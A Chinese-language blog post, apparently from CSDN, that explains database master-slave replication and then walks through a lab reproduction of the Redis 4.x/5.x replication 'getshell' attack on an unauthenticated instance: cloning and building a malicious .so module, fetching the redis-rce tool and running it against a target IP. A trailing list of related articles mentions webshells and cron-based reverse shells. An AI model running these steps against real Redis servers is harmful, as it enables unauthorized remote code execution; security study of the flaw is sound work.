redis一般用来干嘛_redis主从复制getshell

最新推荐文章于 2023-02-16 08:30:00 发布
最新推荐文章于 2023-02-16 08:30:00 发布
阅读量283 收藏 1
点赞数
文章标签: redis一般用来干嘛
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39552538/article/details/111615536
版权

先解释一下主从复制:

主从复制,是用来建立一个和主数据库完全一样的数据库环境,称为从数据库,主数据库一般是准实时的业务数据库。一台服务器充当主服务器,而另外一台服务器充当从服务器。

此时主服务器会将更新信息写入到一个特定的二进制文件中,并会维护文件的一个索引用来跟踪日志循环,这个日志可以记录并发送到从服务器的更新中去。

一台从服务器连接到主服务器时,从服务器会通知主服务器从服务器的日志文件中读取最后一次成功更新的位置。然后从服务器会接收从哪个时刻起发生的任何更新,然后锁住并等到主服务器通知新的更新。

读写分离简单俩说就是基于主从复制架构,一个主库,有多个从库,主库主要负责写,写完后主库会自动把数据给同步给从库。

关于redis主从复制getshell:

Redis是一个使用ANSI C编写的开源、支持网络、基于内存、可选持久性的键值对存储数据库。但如果当把数据存储在单个Redis的实例中,当读写体量比较大的时候,服务端就很难承受。为了应对这种情况,Redis就提供了主从模式,主从模式就是指使用一个redis实例作为主机,其他实例都作为备份机,其中主机和从机数据相同,而从机只负责读,主机只负责写,通过读写分离可以大幅度减轻流量的压力,算是一种通过牺牲空间来换取效率的缓解方式。

漏洞存在于4.x、5.x版本中,Redis提供了主从模式,主从模式指使用一个redis作为主机,其他的作为备份机,主机从机数据都是一样的,从机只负责读,主机只负责写。在Reids 4.x之后,通过外部拓展,可以实现在redis中实现一个新的Redis命令,构造恶意.so文件。在两个Redis实例设置主从模式的时候,Redis的主机实例可以通过FULLRESYNC同步文件到从机上。然后在从机上加载恶意so文件,即可执行命令。

复现:

攻击机:kali  192.168.148.149     python

靶机:centos7 192.168.148.142          redis未授权访问

Kali上生成恶意.so文件:

git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand.git

cd RedisModules-ExecuteCommand/

make

42f955607dcc3976ea68cf486e4fc9f0.png

然后下载利用工具,然后把刚刚生成恶意.so文件移至利用工具目录下

git clone https://github.com/Ridter/redis-rce

mv module.so/root/redis/RedisModules-ExecuteCommand/redis-rce/

9582a1ac31b48ea6ca6601d7f0625b74.png

64762966a6aed1532cc57377e2a2846c.png

最后在kali上运行py文件getshell

python redis-rce.py -r 目标ip-p 目标端口 -L 本地ip -f恶意.so

python redis-rce.py -r 192.168.148.142 -p6379 -L 192.168.148.149 -f module.so

ee76e26e2eb877d2d8ddc2199851a5b4.png

weixin_39552538
关注
Linux企业运维——Redis的安装部署及主从复制、master自动切换,redis、mysql读写分离
qq_60200126的博客
09-20 673
redis lftp 172.25.254.250 cd /pub/docs/redis get redis-6.2.4.tar.gz 解压 cd redis-6.2.4 cd utils vim install_server.sh make make install ./install_server.sh scp redis-6.2.4 server2: tar zxf redis-6.2.4.tar.gz cd redis-6.2.4/ make 报错 yum install -y gcc cd …
Redis哨兵模式 (sentinel) (主从复制,读写分离)
黑马程序员广州中心的专栏
12-12 2542
Redis的集群方案大致有三种: 1)redis cluster集群方案;2)master/slave主从方案;3)哨兵模式来进行主从替换以及故障恢复。 一、sentinel哨兵模式介绍 Sentinel(哨兵)是用于监控redis集群中Master状态的工具,是Redis 的高可用性解决方案,sentinel哨兵模式已经被集成在redis2.4之后的版本中...
第02篇:Redis主从复制getshell1
08-03
1、生成恶意.so文件,下载RedisModules-ExecuteCommand使用make编译即可生成 1、监听本地1234端口 2、将Redis服务器设置
史上最全面redis整理(初版)
皮斯特劳沃
10-24 1623
1、redis数据结构 Redis作为Key-Value型的内存数据库, 其Value有多种类型: String:类型是二进制安全,意思是 redis 的 string 可以包含任何数据。如数字,字符串,jpg图片或者序列化的对象。 实战场景: 缓存: 经典使用场景,把常用信息,字符串,图片或者视频等信息放到redis中,redis作为缓存层,mysql做持久化层,降低mysql的读写压力。 计数器:redis是单线程模型,一个命令执行完才会执行下一个,同时数据可以一步落地到其他的数据源。 session:
redis和php有什么,redis主要用来做什么
weixin_42137028的博客
03-13 256
1、Redis 是什么?通常而言目前的数据库分类有几种,包括 SQL/NSQL,,关系数据库,键值数据库等等 等,分类的标准也不以,Redis本质上也是一种键值数据库的,但它在保持键值数据库简单快捷特点的同时,又吸收了部分关系数据库的优点。从而使它的位置处于关系数据库和键值数 据库之间。Redis不仅能保存Strings类型的数据,还能保存Lists类型(有序)和Sets类型(无序)的数据,而且还...
Redis可以做哪些事?
Java旅途
10-30 1505
都知道redis有五种数据结构,你知道这五种数据结构的使用场景吗?
Redis?它主要用来什么的
热门推荐
野蛮女孩的博客
07-07 15万+
Redis,英文全称是Remote Dictionary Server(远程字典服务),是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。与MySQL数据库不同的是,Redis的数据是存在内存中的。它的读写速度非常快,每秒可以处理超过10万次读写操作。因此redis被广泛应用于缓存,另外,Redis也经常用来做分布式锁。除此之外,Redis支持事务、持久化、LUA 脚本、LRU 驱动事件、多种集群方案。大多数小伙伴都知道,Redi
Redis主从复制漏洞:恶意.so文件与自动化getshell
本文主要探讨了Redis主从复制中的安全漏洞及其利用方法,特别是针对Redis 4.x版本以后引入的模块功能,通过编写恶意.so文件实现远程代码执行(RCE)。以下是关键知识点的详细解析: 1. **Redis未授权漏洞与恶意.so...
自动化部署Redis Shell脚本
01-04
在生产环境中,通常还会涉及Redis主从复制、哨兵(Sentinel)监控以及Cluster集群搭建。主从复制可以实现数据备份,哨兵系统能够监控和自动故障恢复,而Redis Cluster则提供了一种分布式的解决方案,以支持更大规模...
Redis主从复制getshell技巧
06-10 2万+
Redis未授权漏洞常见的漏洞利用方式: Windows下,绝对路径写webshell 、写入启动项。 Linux下,绝对路径写webshell 、公私钥认证获取root权限 、利用contrab计划任务反弹shell。 基于Redis主从复制的机制,可以通过FULLRESYNC将任意文件同步到从节点(slave),这就使得它可以轻易实现以上任何一种漏洞利用方式,而且存在着...
Redis简述|以及它能用于做什么?
最新发布
猿谋人、
02-16 3万+
Redis是一种开源的NoSQL内存数据库,用于高性能的数据存储和访问。Redis支持多种数据类型,包括字符串、哈希、列表、集合和有序集合,并且支持分布式存储和操作。Redis的特点包括快速、高可用和易扩展等,适用于各种应用场景。Redis作为一款高性能的NoSQL数据库,具有快速、高可用和易扩展等优点,广泛应用于互联网、电商、游戏和金融等领域。在使用Redis时,需要考虑数据的特性和访问模式,选择合适的数据类型和持久化机制,同时进行性能优化和容错处理,保证系统的高可用和稳定性。
redis中bitmap的使用
huangchao196的博客
02-08 628
BitMap是什么就是通过一个bit位来表示某个元素对应的值或者状态,其中的key就是对应元素本身。我们知道8个bit可以组成一个Byte,所以bitmap本身会极大的节省储存空间。Redis中的BitMapRedis从2.2.0版本开始新增了setbit,getbit,bitcount等几个bitmap相关命令。虽然是新命令,但是并没有新增新的数据类型,因为setbit等命令只不过是在set上的...
Redis、DB一致性
nice_hui_的博客
12-04 235
参考:https://www.cnblogs.com/rjzheng/p/9041659.html#!comments 非强一致性优选 :先更新数据库,再删缓存 首先,先说一下。老外提出了一个缓存更新套路,名为《Cache-Aside pattern》。其中就指出 失效:应用程序先从cache取数据,没有得到,则从数据库中取数据,成功后,放到缓存中。 命中:应用程序从cache中取数据,取到后返回...
谈谈Redis的热key问题如何解决
Java之间
05-23 3456
点击上方“Java之间”,选择“置顶或者星标”你关注的就是我关心的!作者:孤独烟微信公众号:孤独烟(zrj_guduyan) 引言讲了几天的数据库系列的文章,大家一定看烦...
面试官:你们的redis主要用来做什么?
m0_46286757的博客
07-05 8603
redis一般用来干嘛?数据缓存“redis是一个单线程的NoSQL数据库,主要用来做数据缓存,一般大型网站的应用和数据库之间的那一层就是Redis。前言redis在面试中也是经常被问到的技术点,但运维的面试和开发的不同,运维最多问这几个问题(以三点工作经验的运维为例)redis你们主要用来做什么?你们的redis主要用来存储哪些数据?redis 持久化怎么做的?redis的架构怎么做的?看吧,连redis缓存雪崩,击穿,穿透都不会问,更不用说redis的基础命令了。今天我们主要来讨论前两个,redis主要
Redis应用---Redis可以用来做什么?
A__loser的博客
01-06 2396
Redis可以用来干什么? 1.记录帖子的点赞数、评论数和点击数(hash) 2.记录用户的梯子ID列表(排序),便于快速显示用户的帖子列表(zset)。 3.记录帖子的标题、摘要、作者和封面信息,用于列表页展示。(hash) 4.记录帖子的点赞用户ID列表,评论ID列表,用于显示和去重计数。(zset) 5.缓存近期热帖内容(帖子内容空间占用比较大),减少数据库压力(hash)。 6.记录帖子...
redis是干什么的
weixin_64881460的博客
03-22 3万+
1.redis是干什么的 Redis是一个高速缓存数据库,是一种key-value(键值对)形式的存储系统,非关系型数据库。 2.redis的特点 Redis的数据 是放在内存里的,所以读写会很快,Redis才能实现持久化(两种实现方式) 客户端——>java后端 3.redis的用处 1.用作缓存,优点(1.可以减轻数据库压力 2.可以提高查询效率) 2.点赞数,访问量 3.鉴权,cookie和session 登陆成功后,将对应的可以和value放到redis里,下次如果再进来
完全复制一个dict_Redis主从复制getshell技巧
weixin_33209042的博客
01-02 229
Redis未授权漏洞常见的漏洞利用方式:Windows下,绝对路径写webshell 、写入启动项。Linux下,绝对路径写webshell 、公私钥认证获取root权限 、利用contrab计划任务反弹shell。基于Redis主从复制的机制,可以完美无损的将文件同步到从节点。这就使得它可以轻易实现以上任何一种漏洞利用方式,而且存在着更多的可能性等待被探索。一、Redis 主从复制一...
redis远程备份脚本_Redis主从复制Getshell学习
weixin_34529812的博客
01-31 681
主从复制 Redis就提供了主从模式,主从模式就是指使用一个redis实例作为主机,其他实例都作为备份机,其中主机和从机数据相同,而从机只负责读,主机只负责写,通过读写分离可以大幅度减轻流量的压力,算是一种通过牺牲空间来换取效率的缓解方式。部署redis注意:主从复制的利用方式不需要root权限,在6.0.5版本及以后版本中已经修复了该问题。,所以这里要下载6.0.5以下的版本,同...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值